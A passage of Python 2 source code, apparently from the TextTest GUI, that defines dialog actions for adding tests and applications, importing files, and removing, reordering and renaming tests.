setPlacements(self, suite): # Add suite and its children placements = [ "first in suite" ] for test in suite.testcases: placements.append("after " + test.name) placements.append("last in suite") self.optionGroup.setPossibleValues("testpos", placements) self.optionGroup.getOption("testpos").reset() def _getTitle(self): return "Add " + self.testType() def testType(self): #pragma : no cover - doc only return "" def messageAfterPerform(self): if len(self.testsImported): return "Added new " + ", ".join((repr(test) for test in self.testsImported)) def getNewTestName(self): # Overwritten in subclasses - occasionally it can be inferred return self.optionGroup.getOptionValue("name").strip() def performOnCurrent(self): testName = self.getNewTestName() description = self.optionGroup.getOptionValue("desc") placement = self.getPlacement() self.testsImported = [] for suite in self.currTestSelection: suite.registerTest(testName, description, placement) testDir = suite.makeSubDirectory(testName) self.testsImported.append(self.createTestContents(suite, testDir, description, placement)) suite.contentChanged() self.notify("SetTestSelection", self.testsImported) def getSignalsSent(self): return [ "SetTestSelection" ] def getDestinationSuite(self): return self.currTestSelection[0] def getPlacement(self): option = self.optionGroup.getOption("testpos") return option.possibleValues.index(option.getValue()) def checkName(self, suite, testName): if len(testName) == 0: raise plugins.TextTestError, "No name given for new " + self.testType() + "!" + "\n" + \ "Fill in the 'Adding " + self.testType() + "' tab below." if testName.find(" ") != -1: raise plugins.TextTestError, "The new " + self.testType() + \ " name is not permitted to contain spaces, please specify another" for test in suite.testcases: if test.name == testName: raise plugins.TextTestError, "A " + self.testType() + " with the name '" + \ testName + "' already exists, please choose another name" class ImportTestCase(ImportTest): def __init__(self, *args): ImportTest.__init__(self, *args) self.addDefinitionFileOption() def testType(self): return "Test" def addDefinitionFileOption(self): self.addOption("opt", "Command line options") def createTestContents(self, suite, testDir, description, placement): self.writeDefinitionFiles(suite, testDir) self.writeEnvironmentFile(suite, testDir) self.writeResultsFiles(suite, testDir) return suite.addTestCase(os.path.basename(testDir), description, placement) def getWriteFileName(self, name, suite, testDir): return os.path.join(testDir, name + "." + suite.app.name) def getWriteFile(self, name, suite, testDir): return open(self.getWriteFileName(name, suite, testDir), "w") def writeEnvironmentFile(self, suite, testDir): envDir = self.getEnvironment(suite) if len(envDir) == 0: return envFile = self.getWriteFile("environment", suite, testDir) for var, value in envDir.items(): envFile.write(var + ":" + value + "\n") envFile.close() def writeDefinitionFiles(self, suite, testDir): optionString = self.getOptions(suite) if len(optionString): optionFile = self.getWriteFile("options", suite, testDir) optionFile.write(optionString + "\n") return optionString def getOptions(self, *args): return self.optionGroup.getOptionValue("opt") def getEnvironment(self, *args): return {} def writeResultsFiles(self, suite, testDir): # Cannot do anything in general pass class ImportTestSuite(ImportTest): def __init__(self, *args): ImportTest.__init__(self, *args) self.addEnvironmentFileOptions() def testType(self): return "Suite" def createTestContents(self, suite, testDir, description, placement): return suite.addTestSuite(os.path.basename(testDir), description, placement, self.writeEnvironmentFiles) def addEnvironmentFileOptions(self): self.addSwitch("env", "Add environment file") def writeEnvironmentFiles(self, newSuite): if self.optionGroup.getSwitchValue("env"): envFile = os.path.join(newSuite.getDirectory(), "environment") file = open(envFile, "w") file.write("# Dictionary of environment to variables to set in test suite\n") class ImportApplication(guiplugins.ActionDialogGUI): def __init__(self, allApps, dynamic, inputOptions): guiplugins.ActionDialogGUI.__init__(self, allApps, dynamic, inputOptions) self.fileChooser = None self.newApplication = None self.inputOptions = inputOptions self.rootDirectories = inputOptions.rootDirectories self.addOption("name", "Full name of application", description="Name of application to use in reports etc.") self.addOption("ext", "\nFile extension to use for TextTest files associated with this application", description="Short space-free extension, to identify all TextTest's files associated with this application") possibleSubDirs = self.findSubDirectories() self.addOption("subdir", "\nSubdirectory name to store the above application files under (leave blank for local storage)", possibleValues=possibleSubDirs) self.addOption("javaclass", "\nJava Class name (instead of executable program)") self.addSwitch("gui", "GUI testing option chooser", options = [ "Disable GUI testing options", "PyGTK GUI with StoryText", "Tkinter GUI with StoryText", "wxPython GUI with StoryText", "SWT GUI with StoryText", "Eclipse RCP GUI with StoryText", "Eclipse GEF GUI with StoryText", "Java Swing GUI with StoryText", "Other embedded Use-case Recorder (e.g. NUseCase)", "Other GUI-test tool (enable virtual display only)" ], hideOptions=True) self.addSwitch("cpmock", "Enable CaptureMock for record/playback mocking") possibleDirs = [] for app in allApps: if app.getDirectory() not in possibleDirs: possibleDirs.append(app.getDirectory()) if len(possibleDirs) == 0: possibleDirs = self.rootDirectories self.addOption("exec", "\nSelect executable program to test", description="The full path to the program you want to test", possibleDirs=possibleDirs, selectFile=True) def createFileChooser(self, *args): self.fileChooser = guiplugins.ActionDialogGUI.createFileChooser(self, *args) return self.fileChooser def createOptionWidget(self, option): box, entry = guiplugins.ActionDialogGUI.createOptionWidget(self, option) if option is self.optionGroup.getOption("javaclass"): entry.connect("changed", self.javaClassChanged) return box, entry def javaClassChanged(self, *args): if self.fileChooser: self.setFileChooserSensitivity() def setFileChooserSensitivity(self): javaclass = self.optionGroup.getValue("javaclass") sensitive = self.fileChooser.get_property("sensitive") newSensitive = len(javaclass) == 0 if newSensitive != sensitive: self.fileChooser.set_property("sensitive", newSensitive) def findSubDirectories(self): allDirs = [] for rootDir in self.rootDirectories: usableFiles = filter(lambda f: f not in plugins.controlDirNames, os.listdir(rootDir)) allFiles = [ os.path.join(rootDir, f) for f in usableFiles ] allDirs += filter(os.path.isdir, allFiles) allDirs.sort() return map(os.path.basename, allDirs) def isActiveOnCurrent(self, *args): return True def _getStockId(self): return "add" def _getTitle(self): return "Add Application" def messageAfterPerform(self): pass def getTooltip(self): return "Define a new tested application" def checkSanity(self, ext, executable, subdir, directory, javaClass): if not ext: raise plugins.TextTestError, "Must provide a file extension for TextTest files" for char in " ./": if char in ext: raise plugins.TextTestError, "File extensions may not contain the character " + repr(char) + ". It's recommended to stick to alphanumeric characters for this field." if not javaClass and (not executable or not os.path.isfile(executable)): raise plugins.TextTestError, "Must provide a valid path to a program to test" for char in "/\\": if char in subdir: raise plugins.TextTestError, "Subdirectory name must be a local name (not contain " + repr(char) + ").\nTextTest only looks for applications one level down in the hierarchy." if os.path.exists(os.path.join(directory, "config." + ext)): raise plugins.TextTestError, "Test-application already exists at the indicated location with the indicated extension: please choose another name" def getSignalsSent(self): return [ "NewApplication" ] def getMainClass(self, jarFile): f = ZipFile(jarFile).open("META-INF/MANIFEST.MF") for line in f: parts = [ part.strip() for part in line.split(":") ] if len(parts) == 2 and parts[0] == "Main-Class": return parts[1] def getStatusMessage(self, app): return "Created new application '" + app.fullName() + "'." def performOnCurrent(self): executable = self.optionGroup.getOptionValue("exec") ext = self.optionGroup.getOptionValue("ext") subdir = self.optionGroup.getOptionValue("subdir") directory = self.findFullDirectoryPath(subdir) javaClass = self.optionGroup.getOptionValue("javaclass") self.checkSanity(ext, executable, subdir, directory, javaClass) plugins.ensureDirectoryExists(directory) if javaClass: executable = javaClass configEntries = OrderedDict({ "executable" : executable }) configEntries["filename_convention_scheme"] = "standard" if javaClass: configEntries["interpreter"] = "java" fullName = self.optionGroup.getOptionValue("name") if fullName: configEntries["full_name"] = fullName if self.optionGroup.getSwitchValue("cpmock"): configEntries["import_config_file"] = "capturemock_config" useGui = self.optionGroup.getSwitchValue("gui") if useGui > 0: configEntries["use_case_record_mode"] = "GUI" if useGui in range(1, 8): configEntries["use_case_recorder"] = "storytext" storytextDir = os.path.join(directory, "storytext_files") plugins.ensureDirectoryExists(storytextDir) # Create an empty UI map file so it shows up in the Config tab... open(os.path.join(storytextDir, "ui_map.conf"), "w") toolkits = [ "gtk", "tkinter", "wx", "javaswt", "javarcp", "javagef", "javaswing" ] toolkit = toolkits[useGui - 1] if "java" in toolkit: self.setJavaGuiTestingEntries(toolkit, directory, ext, configEntries) else: self.setPythonGuiTestingEntries(toolkit, directory, ext, configEntries) elif useGui == 9: configEntries["use_case_recorder"] = "none" self.newApplication = self.createApplication(ext, directory, configEntries) self.notify("NewApplication", self.newApplication) self.notify("Status", self.getStatusMessage(self.newApplication)) def createApplication(self, ext, directory, configEntries): dircache = testmodel.DirectoryCache(directory) newApp = testmodel.Application(ext, dircache, [], self.inputOptions, configEntries) dircache.refresh() # we created a config file... return newApp def respond(self, *args): if len(self.validApps) > 0: return guiplugins.ActionDialogGUI.respond(self, *args) def runDialog(self): dialog = self.showConfigurationDialog() width = guiutils.guiConfig.getWindowDimension("width", self.diag) height = guiutils.guiConfig.getWindowDimension("height", self.diag) dialog.resize(width, height) while True: response = dialog.run() if response != gtk.RESPONSE_ACCEPT: raise plugins.TextTestError, "Application creation cancelled." try: self.performOnCurrent() break except plugins.TextTestError, e: self.showErrorDialog(str(e)) dialog.hide() dialog.destroy() return self.newApplication, self.getStatusMessage(self.newApplication) def getFileOnPath(self, fileName): for pathElem in os.getenv("PATH").split(os.pathsep): fullPath = os.path.join(pathElem, fileName) if os.path.isfile(fullPath): return fullPath def getStoryTextPythonInterpreter(self, toolkit): if os.name == "posix": return "storytext -i " + toolkit else: storytextPath = self.getFileOnPath("storytext.py") if storytextPath: return "python " + storytextPath + " -i " + toolkit else: raise plugins.TextTestError, "Could not set up Python-GUI testing with StoryText, could not find StoryText installation on PATH" def setPythonGuiTestingEntries(self, toolkit, directory, ext, configEntries): configEntries["interpreter"] = self.getStoryTextPythonInterpreter(toolkit) if toolkit == "gtk": comment = "XDG_CONFIG_HOME points to user's ~/.config directory.\n" + \ "Behaviour of e.g. FileChoosers can vary wildly depending on settings there.\n" + \ "The following settings makes sure it uses an empty test-dependent directory instead." configEntries["section_comment"] = comment configEntries["copy_test_path"] = "xdg_config_home" configEntries["test_data_ignore"] = "xdg_config_home" configEntries["test_data_environment"] = [("xdg_config_home", "XDG_CONFIG_HOME")] elif toolkit == "tkinter": # StoryText doesn't handle tkMessageBox, deal with it via interception by default comment = "Tkinter doesn't provide any means to simulate interaction with tkMessageBox.\n" + \ "Therefore StoryText cannot handle it. So we capture interaction with it instead.\n" + \ "Cannot have multiple threads interacting with tkinter so we disable the threading also." configEntries["section_comment"] = comment configEntries["import_config_file"] = "capturemock_config" cpMockFileName = os.path.join(directory, "capturemockrc." + ext) with open(cpMockFileName, "w") as f: f.write("[python]\n" + "intercepts = tkMessageBox\n\n" + "[general]\n" + "server_multithreaded = False\n") elif toolkit == "wx": comment = "wxPython GUIs don't seem to work very well when the hide flag is set on Windows.\n" + \ "So we disable it by default here: multiple desktops may be useful." configEntries["section_comment"] = comment configEntries["virtual_display_hide_windows"] = "false" def findStoryTextInPath(self): suffix = ".bat" if os.name == "nt" else "" for pathElem in os.getenv("PATH").split(os.pathsep): storytextPath = os.path.join(pathElem, "storytext") jythonPath = os.path.join(pathElem, "jython" + suffix) if os.path.isfile(storytextPath) and os.path.isfile(jythonPath): return storytextPath, jythonPath return None, None def findSwingLibraryPath(self, storytextPath): rootDir = os.path.dirname(os.path.dirname(storytextPath)) pattern = "swinglibrary-*.jar" for root, _, files in os.walk(rootDir): for file in files: if fnmatch(file, pattern): return os.path.join(rootDir, root, "*") def has_special_chars(self, path): return " " in path or "(" in path def get_dos_corrected_path(self, path): if os.name == "posix" or not self.has_special_chars(path): return path # Windows paths with spaces don't work in classpaths, figure out the correct DOS path dirname, local = os.path.split(path) if self.has_special_chars(local): p = subprocess.Popen([ "dir", "/x" ], cwd=dirname, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) out = p.communicate()[0] for line in out.splitlines(): if line.endswith(local): parts = line.split() local = parts[3] break return os.path.join(self.get_dos_corrected_path(dirname), local) def setJavaGuiTestingEntries(self, toolkit, directory, ext, configEntries): storytextPath, jythonPath = self.findStoryTextInPath() if not storytextPath: raise plugins.TextTestError, "Could not set up Java-GUI testing with StoryText, could not find StoryText/Jython installation on PATH" interpreters = [("jython", jythonPath), ("storytext", storytextPath)] configEntries["interpreters"] = interpreters # Jython messages, probably don't want to compare them configEntries["run_dependent_text"] = [("stderr*", "\\*sys-package-mgr\\*")] executable = configEntries["executable"] classpath = [] if executable.endswith(".jar"): # Java Guis of one sort or another # We don't know how to load jar files directly, store the main class name and add the jar file to the environment. mainClass = self.getMainClass(executable) if not mainClass: raise plugins.TextTestError, "Jar file provided has no main class specified, cannot use it as an executable" classpath.append(self.get_dos_corrected_path(executable)) configEntries["executable"] = mainClass if "swing" in toolkit: swingLibraryPath = self.findSwingLibraryPath(storytextPath) if swingLibraryPath: classpath.append(swingLibraryPath) if classpath: fileName = os.path.join(directory, "environment." + ext) with open(fileName, "a") as f: f.write("CLASSPATH:" + os.pathsep.join(classpath) + "\n") storytextOptionsFile = os.path.join(directory, "storytext_options." + ext) with open(storytextOptionsFile, "w") as f: f.write("# StoryText options. Run storytext --help for more information on what can be added here\n") f.write("-i " + toolkit + "\n") with open(storytextOptionsFile + ".debug", "w") as f: f.write("-l debug\n") jythonOptionsFile = os.path.join(directory, "jython_options." + ext) with open(jythonOptionsFile, "w") as f: f.write("# Add Java properties as required, for example:\n") f.write("#-Djava.util.prefs.userRoot=preferences\n") f.write("# Can also supply JVM arguments by prefixing them with -J, for example:\n") f.write("#-J-XX:MaxPermSize=128M") def findFullDirectoryPath(self, subdir): for rootDir in self.rootDirectories: candidate = os.path.normpath(os.path.join(rootDir, subdir)) if os.path.isdir(candidate): return candidate return os.path.normpath(os.path.join(self.rootDirectories[0], subdir)) def getSizeAsWindowFraction(self): # size of the dialog return 0.7, 0.9 class ImportFiles(guiplugins.ActionDialogGUI): def __init__(self, allApps, dynamic, inputOptions): self.creationDir = None self.defaultAppendAppName = False self.appendAppName = False self.currentStem = "" self.fileChooser = None self.newFileInfo = (None, False) guiplugins.ActionDialogGUI.__init__(self, allApps, dynamic, inputOptions) self.addOption("stem", "Type of file/directory to create", allocateNofValues=2) self.addOption("v", "Version identifier to use") possibleDirs = self.getPossibleDirs(allApps, inputOptions) # The point of this is that it's never sensible as the source for anything, so it serves as a "use the parent" option # for back-compatibility self.addSwitch("act", options=[ "Import file/directory from source", "Create a new file", "Create a new directory" ]) self.addOption("src", "Source to copy from", selectFile=True, possibleDirs=possibleDirs) def getPossibleDirs(self, allApps, inputOptions): if len(allApps) > 0: return sorted(set((app.getDirectory() for app in allApps))) else: return inputOptions.rootDirectories def singleTestOnly(self): return True def _getTitle(self): return "Create/_Import" def getTooltip(self): return "Create a new file or directory, possibly by copying it" def _getStockId(self): return "new" def getDialogTitle(self): return "Create/Import Files and Directories" def isActiveOnCurrent(self, *args): return self.creationDir is not None and guiplugins.ActionDialogGUI.isActiveOnCurrent(self, *args) def getSizeAsWindowFraction(self): # size of the dialog return 0.7, 0.9 def getSignalsSent(self): return [ "NewFile" ] def messageAfterPerform(self): pass def updateOptions(self): self.currentStem = "" return False def fillVBox(self, vbox, group): test = self.currTestSelection[0] dirText = self.getDirectoryText(test) self.addText(vbox, "<b><u>" + dirText + "</u></b>") self.addText(vbox, "<i>(Test is " + repr(test) + ")</i>") return guiplugins.ActionDialogGUI.fillVBox(self, vbox, group) def stemChanged(self, *args): option = self.optionGroup.getOption("stem") newStem = option.getValue() if newStem in option.possibleValues and newStem != self.currentStem: self.currentStem = newStem version = self.optionGroup.getOptionValue("v") sourcePath = self.getDefaultSourcePath(newStem, version) self.optionGroup.setValue("src", sourcePath) if self.defaultAppendAppName: self.updateAppendAppName(newStem != "testcustomize.py") def actionChanged(self, *args): if self.fileChooser: self.setFileChooserSensitivity() def setFileChooserSensitivity(self): action = self.optionGroup.getValue("act") sensitive = self.fileChooser.get_property("sensitive") newSensitive = action == 0 if newSensitive != sensitive: self.fileChooser.set_property("sensitive", newSensitive) def getTargetPath(self, *args, **kwargs): targetPathName = self.getFileName(*args, **kwargs) return os.path.join(self.creationDir, targetPathName) def getDefaultSourcePath(self, stem, version): targetPath = self.getTargetPath(stem, version) test = self.currTestSelection[0] pathNames = test.getAllPathNames(stem, refVersion=version) if len(pathNames) > 0: firstSource = pathNames[-1] if os.path.basename(firstSource).startswith(stem + "." + test.app.name): targetPath = self.getTargetPath(stem, version, appendAppName=True) if firstSource != targetPath: return firstSource elif len(pathNames) > 1: return pathNames[-2] return test.getDirectory() def createComboBoxEntry(self, *args): combobox, entry = guiplugins.ActionDialogGUI.createComboBoxEntry(self, *args) combobox.connect("changed", self.stemChanged) return combobox, entry def createRadioButtons(self, *args): buttons = guiplugins.ActionDialogGUI.createRadioButtons(self, *args) buttons[0].connect("toggled", self.actionChanged) return buttons def createFileChooser(self, *args): self.fileChooser = guiplugins.ActionDialogGUI.createFileChooser(self, *args) self.fileChooser.set_name("Source File Chooser") self.setFileChooserSensitivity() # Check initial values, maybe set insensitive return self.fileChooser def addText(self, vbox, text): header = gtk.Label() header.set_markup(text + "\n") vbox.pack_start(header, expand=False, fill=False) def getDirectoryText(self, test): relDir = plugins.relpath(self.creationDir, test.getDirectory()) if relDir: return "Create or import files in test subdirectory '" + relDir + "'" else: return "Create or import files in the test directory" def notifyFileCreationInfo(self, creationDir, fileType): self.fileChooser = None if fileType == "external": self.creationDir = None self.setSensitivity(False) else: self.creationDir = creationDir newActive = creationDir is not None self.setSensitivity(newActive) if newActive: self.updateStems(fileType) self.defaultAppendAppName = (fileType == "definition" or fileType == "standard") self.updateAppendAppName(self.defaultAppendAppName) def updateAppendAppName(self, setting): self.appendAppName = setting self.optionGroup.setValue("act", int(setting)) def findAllStems(self, fileType): if fileType == "definition": return self.getDefinitionFiles() elif fileType == "data": return self.currTestSelection[0].getDataFileNames() elif fileType == "standard": return self.getStandardFiles() else: return [] def getDefinitionFiles(self): defFiles = [] defFiles.append("environment") defFiles.append("config") defFiles.append("options") for interpreter in self.currTestSelection[0].getConfigValue("interpreters").keys(): defFiles.append(interpreter + "_options") if self.currTestSelection[0].classId() == "test-case": recordMode = self.currTestSelection[0].getConfigValue("use_case_record_mode") if recordMode == "disabled": namingScheme = self.currTestSelection[0].getConfigValue("filename_convention_scheme") defFiles.append(self.currTestSelection[0].app.getStdinName(namingScheme)) else: defFiles.append("usecase") # We only want to create files this way that # (a) are not created and understood by TextTest itself ("builtin") # (b) are not auto-generated ("regenerate") # That leaves the rest ("default") return defFiles + self.currTestSelection[0].expandedDefFileStems("default") def getStandardFiles(self): app = self.currTestSelection[0].app collateKeys = app.getConfigValue("collate_file").keys() # Don't pick up "dummy" indicators on Windows... namingScheme = app.getConfigValue("filename_convention_scheme") stdFiles = [ app.getStdoutName(namingScheme), app.getStderrName(namingScheme) ] + filter(lambda k: k, collateKeys) discarded = [ "stacktrace" ] + app.getConfigValue("discard_file") return filter(lambda f: f not in discarded, stdFiles) def updateStems(self, fileType): stems = self.findAllStems(fileType) if len(stems) > 0: self.optionGroup.setValue("stem", stems[0]) else: self.optionGroup.setValue("stem", "") self.optionGroup.setPossibleValues("stem", stems) def getFileName(self, stem, version, appendAppName=False): fileName = stem if self.appendAppName or appendAppName: fileName += "." + self.currTestSelection[0].app.name if version: fileName += "." + version return fileName def performOnCurrent(self): stem = self.optionGroup.getOptionValue("stem") version = self.optionGroup.getOptionValue("v") action = self.optionGroup.getSwitchValue("act") test = self.currTestSelection[0] if action > 0: # Create new targetPath = self.getTargetPath(stem, version) if os.path.exists(targetPath): raise plugins.TextTestError, "Not creating file or directory : path already exists:\n" + targetPath if action == 1: plugins.ensureDirExistsForFile(targetPath) file = open(targetPath, "w") file.close() test.refreshFiles() self.newFileInfo = targetPath, False elif action == 2: plugins.ensureDirectoryExists(targetPath) test.filesChanged() else: sourcePath = self.optionGroup.getOptionValue("src") appendAppName = os.path.basename(sourcePath).startswith(stem + "." + test.app.name) targetPath = self.getTargetPath(stem, version, appendAppName) plugins.ensureDirExistsForFile(targetPath) fileExisted = os.path.exists(targetPath) plugins.copyPath(sourcePath, targetPath) self.newFileInfo = targetPath, fileExisted def endPerform(self): # Shouldn't start new actions until the current ones complete, framework doesn't like it guiplugins.ActionDialogGUI.endPerform(self) fileName, existed = self.newFileInfo if fileName: self.notify("NewFile", fileName, existed) self.newFileInfo = (None, False) class RemoveTests(guiplugins.ActionGUI): def __init__(self, *args, **kw): self.distinctTestCount = 0 guiplugins.ActionGUI.__init__(self, *args, **kw) def isActiveOnCurrent(self, *args): return any((test.parent for test in self.currTestSelection)) def getActionName(self): return "Remove Tests" def _getTitle(self): return "Remove Tests..." def _getStockId(self): return "delete" def getTooltip(self): return "Remove selected tests" def getTestCountDescription(self): desc = plugins.pluralise(self.distinctTestCount, "test") diff = len(self.currTestSelection) - self.distinctTestCount if diff > 0: desc += " (with " + plugins.pluralise(diff, "extra instance") + ")" return desc def updateSelection(self, tests, apps, rowCount, *args): self.distinctTestCount = rowCount return guiplugins.ActionGUI.updateSelection(self, tests, apps, rowCount, *args) def getFileRemoveWarning(self): return "This will remove files from the file system and hence may not be reversible." def getConfirmationMessage(self): extraLines = "\n\nNote: " + self.getFileRemoveWarning() + "\n\nAre you sure you wish to proceed?\n""" currTest = self.currTestSelection[0] if len(self.currTestSelection) == 1: if currTest.classId() == "test-case": return "\nYou are about to remove the test '" + currTest.name + \ "' and all associated files." + extraLines else: return "\nYou are about to remove the entire test suite '" + currTest.name + \ "' and all " + str(currTest.size()) + " tests that it contains." + extraLines else: return "\nYou are about to remove " + self.getTestCountDescription() + \ " and all associated files." + extraLines def getTestsToRemove(self, list): toRemove = [] warnings = "" for test in list: if not test.parent: warnings += "\nThe root suite\n'" + test.name + " (" + test.app.name + ")'\ncannot be removed.\n" continue if test.classId() == "test-suite": subTests, subWarnings = self.getTestsToRemove(test.testcases) warnings += subWarnings for subTest in subTests: if not subTest in toRemove: toRemove.append(subTest) if not test in toRemove: toRemove.append(test) return toRemove, warnings def performOnCurrent(self): namesRemoved = [] toRemove, warnings = self.getTestsToRemove(self.currTestSelection) permMessage = "Failed to remove test: didn't have sufficient write permission to the test files" for test in toRemove: dir = test.getDirectory() if os.path.isdir(dir): plugins.tryFileChange(self.removePath, permMessage, dir) if plugins.tryFileChange(test.remove, permMessage): namesRemoved.append(test.name) self.notify("Status", "Removed test(s) " + ",".join(namesRemoved)) if warnings: self.showWarningDialog(warnings) @staticmethod def removePath(dir): return plugins.removePath(dir) def messageAfterPerform(self): pass # do it as part of the method as currentTest will have changed by the end! class RemoveTestsForPopup(RemoveTests): def _getTitle(self): return "Remove..." def getActionName(self): return "Remove Tests For Popup" class RemoveFiles(guiplugins.ActionGUI): def notifyFileCreationInfo(self, creationDir, fileType): canRemove = fileType != "external" and \ (creationDir is None or len(self.currFileSelection) > 0) and \ self.isActiveOnCurrent() self.setSensitivity(canRemove) def isActiveOnCurrent(self, *args): return len(self.currFileSelection) > 0 def getActionName(self): return "Remove Files" def _getTitle(self): return "Remove..." def _getStockId(self): return "delete" def getTooltip(self): return "Remove selected files" def getFileRemoveWarning(self): return "This will remove files from the file system and hence may not be reversible." def getConfirmationMessage(self): extraLines = "\n\nNote: " + self.getFileRemoveWarning() + "\n\nAre you sure you wish to proceed?\n""" test = self.getFirstTest() return "\nYou are about to remove " + plugins.pluralise(len(self.currFileSelection), self.getType(self.currFileSelection[0][0])) + \ self.getTestSuffix(test) + "." + extraLines def inConfigTab(self): return isinstance(self.currFileSelection[0][1], list) def getTestSuffix(self, test): return " from the " + test.classDescription() + " '" + test.name + "'" if test else "" @staticmethod def removePath(dir): return plugins.removePath(dir) def getType(self, filePath): if os.path.isdir(filePath): return "directory" else: return "file" def getFirstTest(self): return self.currTestSelection[0] if not self.inConfigTab() else None def performOnCurrent(self): test = self.getFirstTest() removed = 0 for filePath, _ in self.currFileSelection: fileType = self.getType(filePath) self.notify("Status", "Removing " + fileType + " " + os.path.basename(filePath)) self.notify("ActionProgress") permMessage = "Insufficient permissions to remove " + fileType + " '" + filePath + "'" if filePath.endswith(".shortcut"): from storytext.replayer import ReplayScript script = ReplayScript(filePath, False) commands = "\n".join(script.commands) self.notify("ShortcutRemove", ReplayScript.transformToRegexp(ReplayScript.tryToGetName(filePath)) + "\n renamed to " + commands + "\n") if plugins.tryFileChange(self.removePath, permMessage, filePath): removed += 1 if test: test.filesChanged() else: self.appFilesChanged() self.notify("Status", "Removed " + plugins.pluralise(removed, fileType) + self.getTestSuffix(test)) def getSignalsSent(self): return [ "ReloadConfig", "ShortcutRemove" ] def appFilesChanged(self): appsSeen = set() for _, apps in self.currFileSelection: for app in apps: if app not in appsSeen: appsSeen.add(app) app.refreshFiles() self.notify("ReloadConfig") def messageAfterPerform(self): pass # do it as part of the method, uses lots of local data class RepositionTest(guiplugins.ActionGUI): def singleTestOnly(self): return True def _isActiveOnCurrent(self): return guiplugins.ActionGUI.isActiveOnCurrent(self) and \ self.currTestSelection[0].parent and \ not self.currTestSelection[0].parent.autoSortOrder def getSignalsSent(self): return [ "RefreshTestSelection" ] def performOnCurrent(self): newIndex = self.findNewIndex() test = self.currTestSelection[0] permMessage = "Failed to reposition test: no permissions to edit the testsuite file" if plugins.tryFileChange(test.parent.repositionTest, permMessage, test, newIndex): self.notify("RefreshTestSelection") else: raise plugins.TextTestError, "\nThe test\n'" + test.name + "'\nis not present in the default version\nand hence cannot be reordered.\n" class RepositionTestDown(RepositionTest): def _getStockId(self): return "go-down" def _getTitle(self): return "Move down" def messageAfterPerform(self): return "Moved " + self.describeTests() + " one step down in suite." def getTooltip(self): return "Move selected test down in suite" def findNewIndex(self): return min(self.currTestSelection[0].positionInParent() + 1, self.currTestSelection[0].parent.maxIndex()) def isActiveOnCurrent(self, *args): if not self._isActiveOnCurrent(): return False return self.currTestSelection[0].parent.testcases[self.currTestSelection[0].parent.maxIndex()] != self.currTestSelection[0] class RepositionTestUp(RepositionTest): def _getStockId(self): return "go-up" def _getTitle(self): return "Move up" def messageAfterPerform(self): return "Moved " + self.describeTests() + " one step up in suite." def getTooltip(self): return "Move selected test up in suite" def findNewIndex(self): return max(self.currTestSelection[0].positionInParent() - 1, 0) def isActiveOnCurrent(self, *args): if not self._isActiveOnCurrent(): return False return self.currTestSelection[0].parent.testcases[0] != self.currTestSelection[0] class RepositionTestFirst(RepositionTest): def _getStockId(self): return "goto-top" def _getTitle(self): return "Move to first" def messageAfterPerform(self): return "Moved " + self.describeTests() + " to first in suite." def getTooltip(self): return "Move selected test to first in suite" def findNewIndex(self): return 0 def isActiveOnCurrent(self, *args): if not self._isActiveOnCurrent(): return False return self.currTestSelection[0].parent.testcases[0] != self.currTestSelection[0] class RepositionTestLast(RepositionTest): def _getStockId(self): return "goto-bottom" def _getTitle(self): return "Move to last" def messageAfterPerform(self): return "Moved " + repr(self.currTestSelection[0]) + " to last in suite." def getTooltip(self): return "Move selected test to last in suite" def findNewIndex(self): return self.currTestSelection[0].parent.maxIndex() def isActiveOnCurrent(self, *args): if not self._isActiveOnCurrent(): return False currLastTest = self.currTestSelection[0].parent.testcases[len(self.currTestSelection[0].parent.testcases) - 1] return currLastTest != self.currTestSelection[0] class RenameAction(guiplugins.ActionDialogGUI): def singleTestOnly(self): return True def _getStockId(self): return "italic" def _getTitle(self): return "_Rename..." def messageAfterPerform(self): pass # Use method below instead. def basicNameCheck(self, newName): if len(newName) == 0: raise plugins.TextTestError, "Please enter a new name." if " " in newName: raise plugins.TextTestError, "The new name must not contain spaces, please choose another name." def performOnCurrent(self): try: newName = self.optionGroup.getOptionValue("name") self.basicNameCheck(newName) self.performRename(newName) except (IOError, OSError), e: self.showErrorDialog("Failed to " + self.getActionName().lower() + ":\n" + str(e)) @staticmethod def movePath(oldPath, newPath): # overridden by version control modules os.rename(oldPath, newPath) class RenameTest(RenameAction): def __init__(self, *args): RenameAction.__init__(self, *args) self.addOption("name", "\nNew name") self.addOption("desc", "\nNew description", multilineEntry=True) self.oldName = "" self.oldDescription = "" def getSizeAsWindowFraction(self): # size of the dialog return 0.5, 0.36 def isActiveOnCurrent(self, *args): # Don't allow renaming of the root suite return guiplugins.ActionGUI.isActiveOnCurrent(self, *args) and bool(self.currTestSelection[0].parent) def updateOptions(self): self.oldName = self.currTestSelection[0].name self.oldDescription = self.currTestSelection[0].description self.optionGroup.setOptionValue("name", self.oldName) self.optionGroup.setOptionValue("desc", self.oldDescription) return True def fillVBox(self, vbox, group): header = gtk.Label() header.set_markup("<b>" + plugins.convertForMarkup(self.oldName) + "</b>") vbox.pack_start(header, expand=False, fill=False) return guiplugins.ActionDialogGUI.fillVBox(self, vbox, group) def getTooltip(self): return "Rename selected test" def getActionName(self): return "Rename Test" def getNameChangeMessage(self, newName): return "Renamed test " + self.oldName + " to " + newName def getChangeMessage(self, newName, newDesc): if self.oldName != newName: message = self.getNameChangeMessage(newName) if self.oldDescription != newDesc: message += " and changed description." else: message += "." elif newDesc != self.oldDescription: message = "Changed description of test " + self.oldName + "." else: message = "Nothing changed." return message def checkNewName(self, newName): if newName != self.oldName: for test in self.currTestSelection[0].parent.testCaseList(): if test.name == newName: raise plugins.TextTestError, "The name '" + newName + "' is already taken, please choose another name." newDir = os.path.join(self.currTestSelection[0].parent.getDirectory(), newName) if os.path.isdir(newDir): self.handleExistingDirectory(newDir) def handleExistingDirectory(self, newDir): # In CVS we might need to override this... raise plugins.TextTestError, "The directory " + newDir + " already exists, please choose another name." def performRename(self, newName): self.checkNewName(newName) newDesc = self.optionGroup.getOptionValue("desc") if newName != self.oldName or newDesc != self.oldDescription: for test in self.currTestSelection: # Do this first, so that if we fail we won't update the test suite files either self.moveFiles(test, newName) test.rename(newName, newDesc) changeMessage = self.getChangeMessage(newName, newDesc) self.oldName = newName self.oldDescription = newDesc self.notify("Status", changeMessage) def moveFiles(self, test, newName): # Create new directory, copy files if the new name is new (we might have # changed only the comment ...) if test.name != newName: oldDir = test.getDirectory() newDir = test.parent.getNewDirectoryName(newName) if os.path.isdir(oldDir): self.movePath(oldDir, newDir) class RenameFile(RenameAction): def __init__(self, *args): RenameAction.__init__(self, *args) self.addOption("name", "\nNew name for file") self.oldName = "" self.configAppList = [] def notifyFileCreationInfo(self, creationDir, fileType): canRename = fileType != "external" and \ (creationDir is None or 